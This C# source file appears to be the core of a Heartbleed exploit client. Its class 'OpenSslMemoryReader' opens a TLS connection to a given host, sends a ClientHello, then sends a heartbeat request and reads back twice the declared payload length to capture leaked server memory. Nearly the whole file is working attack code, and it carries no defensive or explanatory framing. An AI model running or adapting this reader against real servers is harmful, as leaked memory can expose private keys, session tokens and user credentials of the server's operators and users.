﻿using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Net.Sockets;
using System.Text;
using System.Threading.Tasks;

namespace BleedOut
{
    public class OpenSslMemoryReader
    {
        public string Host { get; set; }

        public int Port { get; set; }

        public byte[] ReadChunk()
        {
            TcpClient client = null;

            var record = TlsHelper.CreateClientHello();
            var clientHelloPacket = record.ToBytes();
            
            try
            {
                client = new TcpClient()
                {
                    LingerState = new LingerOption(true, 0),
                };

                client.SendTimeout = client.ReceiveTimeout = 10000;
                client.Connect(Host, Port);

                using (var stream = client.GetStream())
                {
                    stream.Write(clientHelloPacket);
                    
                    byte[] buffer = null;

                    int tries = 0, maxTries = 5;

                    while (buffer == null || buffer.Length == 0 || buffer[0] != 0x16)
                    {
                        if (++tries > maxTries)
                        {
                            return null;
                        }

                        buffer = stream.ReadAll();                        
                    }

                    var heartbeat = TlsHelper.CreateHeartbeat();
                    stream.Write(heartbeat.ToBytes());
                    buffer = stream.Read(heartbeat.PayloadLength * 2);

                    if (buffer[0] == 0x15)
                    {
                        return null;
                    }

                    return buffer.Skip(3).ToArray();
                }
            }
            finally
            {
                if (client != null)
                {
                    client.Close();                    
                }
            }
        }
    }
}
